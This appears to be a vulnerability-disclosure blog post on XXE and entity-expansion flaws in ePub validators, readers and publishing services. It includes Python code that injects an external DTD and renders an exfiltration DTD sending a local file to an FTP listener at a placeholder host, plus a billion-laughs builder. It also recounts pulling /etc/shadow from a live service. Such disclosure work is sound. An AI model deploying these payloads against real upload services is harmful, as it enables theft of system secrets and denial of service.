“We use the ePub format - it is the most popular open book format in the world. We’re very excited about this.” - Steve Jobs, 2010 (original iPad launch)
TL;DR: Applying a familiar XXE (XML External Entity) pattern to exploit services and readers that consume the ePub format. This covers vulnerabilities in EpubCheck <= 4.0.1 (ePub validation Java library and tool), Adobe Digital Editions <= 4.5.2 (book reader), Amazon KDP (Kindle publishing online service), Apple Transporter, and Google Play Book uploads, among others.
ePub is a standard format for open books maintained by IDPF (International Digital Publishing Forum). IDPF is a trade and standards association for the digital publishing industry, set up to establish a standard for ebook publishing. Their membership list: http://idpf.org/membership/members
ePub uses XML metadata to define the document structure and to support digital signatures, digital rights management (DRM), and so on.
eg., epub archive:
eg., contents of META-INF/container.xml
eg., contents of book.opf
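To make the layout concrete, here is a minimal sketch (not part of the original tooling) that lists the files in an ePub and follows META-INF/container.xml to the package file. The function names `list_entries` and `find_opf_path` are made up for illustration; the container namespace is the one defined by the OCF specification.

```python
import zipfile
import xml.etree.ElementTree as ET

CONTAINER_PATH = "META-INF/container.xml"
# Namespace used by OCF container documents.
CONTAINER_NS = {"c": "urn:oasis:names:tc:opendocument:xmlns:container"}


def list_entries(epub_path):
    """Return the names of all files inside the ePub (it is a ZIP archive)."""
    with zipfile.ZipFile(epub_path) as archive:
        return archive.namelist()


def find_opf_path(epub_path):
    """Read META-INF/container.xml and return the path of the package (.opf) file."""
    with zipfile.ZipFile(epub_path) as archive:
        container_xml = archive.read(CONTAINER_PATH)
    # Only run this on files you trust: it is an inspection aid, not a hardened parser.
    root = ET.fromstring(container_xml)
    rootfile = root.find("c:rootfiles/c:rootfile", CONTAINER_NS)
    if rootfile is None:
        raise ValueError("container.xml has no <rootfile> element")
    return rootfile.attrib["full-path"]
```

Calling `find_opf_path("book.epub")` on a typical book returns something like the path of its `.opf` file, which is the XML file that describes the book's metadata, manifest, and reading order.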
When I first started looking into this, I learned about a tool/Java library called EpubCheck (provided by IDPF) that is used to validate books in the ePub format. Book publishers tend to perform a validation step using something like this to check the format validity. The validator tool/library was vulnerable to XXE, so any application that relies on a vulnerable version to check the validity of a book would be susceptible to this type of attack.
Modifying an existing ePub file to test for XML parsing vulnerabilities:
curl https://s3-us-west-2.amazonaws.com/pressbooks-samplefiles/MetamorphosisJacksonTheme/Metamorphosis-jackson.epub -o book.epub
unzip book.epub; rm book.epub
Edit any of the files that contain XML metadata.
eg., book.opf (XXE - XML External Entities pattern)
zip -r book.epub *
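The edit to book.opf can be sketched as a small helper that adds a DOCTYPE pulling in an external DTD through a parameter entity. This is the generic, widely documented XXE pattern rather than the exact payload used here; `inject_doctype`, the `remote` entity name, and the listener URL are all hypothetical.

```python
import re


def inject_doctype(opf_xml, dtd_url, root_name="package"):
    """Return opf_xml with a DOCTYPE that references an external DTD.

    root_name is an assumption: the root element of an OPF file is normally
    <package>, and non-validating parsers do not check that it matches.
    """
    doctype = (
        f"<!DOCTYPE {root_name} [\n"
        f'  <!ENTITY % remote SYSTEM "{dtd_url}">\n'
        f"  %remote;\n"
        f"]>\n"
    )
    # The DOCTYPE has to come after the XML declaration, if there is one.
    match = re.match(r"<\?xml[^>]*\?>\s*", opf_xml)
    insert_at = match.end() if match else 0
    return opf_xml[:insert_at] + doctype + opf_xml[insert_at:]


if __name__ == "__main__":
    sample = '<?xml version="1.0" encoding="UTF-8"?>\n<package version="2.0"></package>'
    # listener.example is a placeholder for a host you control.
    print(inject_doctype(sample, "http://listener.example:8000/ext.dtd"))
```

A parser that resolves external entities will request the DTD URL as soon as it reads the prolog, which is what makes the request visible on the listener side.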
Point the external entity at an HTTP server that serves the following contents, which specify an FTP server to receive the requested file:
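As a rough illustration of what such a DTD can look like, the sketch below renders the common out-of-band pattern: one parameter entity reads a local file, and a second one embeds its contents in an FTP URL. It is an assumption about the general shape, not the exact file served in this test; `render_exfil_dtd`, the entity names, the host, and the port are placeholders.

```python
def render_exfil_dtd(target_file, ftp_host, ftp_port=2121):
    """Return the text of an external DTD using the out-of-band XXE pattern.

    target_file is an absolute path on the machine running the XML parser.
    ftp_host and ftp_port identify a listener you control (hypothetical values).
    """
    lines = [
        # Read the local file into a parameter entity.
        f'<!ENTITY % file SYSTEM "file://{target_file}">',
        # Declare a second entity whose URL embeds the file contents.
        # &#x25; is an escaped '%', needed inside an entity value.
        f"<!ENTITY % wrap \"<!ENTITY &#x25; send SYSTEM 'ftp://{ftp_host}:{ftp_port}/%file;'>\">",
        "%wrap;",
        # Referencing %send; makes the parser open the FTP URL.
        "%send;",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(render_exfil_dtd("/etc/hostname", "listener.example"))
```

FTP is a popular choice for the second hop because some Java versions pass multi-line file contents through in FTP commands, where an HTTP URL would be rejected.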
EpubCheck <= 4.0.1
There was an online instance of EpubCheck that would accept user uploads and validate the format. It serves as an example of how this vulnerability could be used to attack online services that support ePub in some way, if they use a vulnerable version of EpubCheck to validate the uploaded file.
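When working with test files like this, it helps to confirm which XML files in an archive actually declare external entities. The sketch below does that with Python's expat bindings, which report entity declarations without fetching anything; `external_entities`, `scan_epub`, and the suffix list are illustrative choices, not part of EpubCheck.

```python
import zipfile
from xml.parsers import expat

# File types inside an ePub that are usually XML (an assumption, not exhaustive).
XML_SUFFIXES = (".xml", ".opf", ".ncx", ".xhtml")


def external_entities(xml_bytes):
    """Return (name, system_id) for each entity declared with an external identifier."""
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # Internal entities carry a value and no system identifier.
        if system_id is not None:
            found.append((name, system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError:
        pass  # Malformed input: keep whatever was seen before the error.
    return found


def scan_epub(epub_path):
    """Map each XML file in the archive to the external entities it declares."""
    report = {}
    with zipfile.ZipFile(epub_path) as archive:
        for name in archive.namelist():
            if name.lower().endswith(XML_SUFFIXES):
                hits = external_entities(archive.read(name))
                if hits:
                    report[name] = hits
    return report
```

Running `scan_epub("book.epub")` on an unmodified book should normally return an empty dictionary, while a file carrying the pattern shows up with the URL or path it points to.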
Uploading our created file:
The HTTP listener receives the DTD request when the file is parsed by the remote XML parser, and a custom FTP listener receives the file (I didn’t think it would work, but I specified /etc/shadow as the file to retrieve).
This means that we accidentally retrieved the /etc/shadow file. Public facing web apps running as root/system in prod… 😫
A few examples of other services and applications I came across that were vulnerable:
Amazon KDP, which allows publishers to upload books, was susceptible to XXE when converting books to the Kindle format.
External DTD specifying the file to retrieve:
eg., Retrieving secret stuff from a user's Windows Documents folder:
Apple Transporter (underlying tool used to validate metadata and assets and deliver them to the iTunes Store), CVE-2016-7666.
Google Play Book uploads did not allow external entity processing, but were vulnerable to XML exponential entity expansion (the "billion laughs" attack). When an ePub with this pattern was uploaded, the service would spend about 45 minutes trying to process the file before returning an error condition. Google confirmed this on their side.
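The arithmetic behind exponential entity expansion is easy to sketch: if each entity references the previous one `fanout` times, the final entity expands to `fanout ** levels` copies of the seed string. The helper names and the `e0`, `e1`, ... entity names below are made up for illustration, and the builder is only meant to be run with small parameters.

```python
def expanded_length(levels, fanout, seed="lol"):
    """Number of characters the top-level entity expands to."""
    return len(seed) * fanout ** levels


def build_nested_entities(levels, fanout, seed="lol"):
    """Build a small XML document with nested internal entities.

    e0 holds the seed; each e<i> references e<i-1> `fanout` times.
    """
    decls = [f'<!ENTITY e0 "{seed}">']
    for i in range(1, levels + 1):
        refs = f"&e{i - 1};" * fanout
        decls.append(f'<!ENTITY e{i} "{refs}">')
    body = "\n  ".join(decls)
    return f"<!DOCTYPE root [\n  {body}\n]>\n<root>&e{levels};</root>"


if __name__ == "__main__":
    # A tiny, harmless instance: 2 levels with fan-out 3 expands to 27 characters.
    print(build_nested_entities(2, 3))
    print(expanded_length(2, 3))
    # The classic shape (9 levels, fan-out 10) expands to 3,000,000,000 characters.
    print(expanded_length(9, 10))
```

The document itself stays under a kilobyte, which is why a parser without expansion limits can burn a lot of time and memory on a very small upload.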
Disclosure timeline stuff:
- Sep 2016: Reported XXE in EpubCheck <= 4.0.1.
- Sep 2016: Reported XXE in Adobe Digital Editions <= 4.5.2.
- Sep 2016: Reported XXE in Amazon KDP.
- Oct 2016: Reported XXE in Apple Transporter.
- Oct 2016: Reported XML exponential entity expansion in play.google.com book uploads.
- Dec 2016: Coordinated disclosure.
- Jan 2017: This blog post (lots of time for users to patch).
Thanks to CERT/CC for their help in coordinating with the different vendors and IDPF, and in setting a disclosure timeline. I only tested a handful of digital readers and services, so if you find other vulnerable readers or services, tell CERT/CC (they were tracking the EpubCheck issue as VU#779243).
If you got this far, thanks for reading. 👋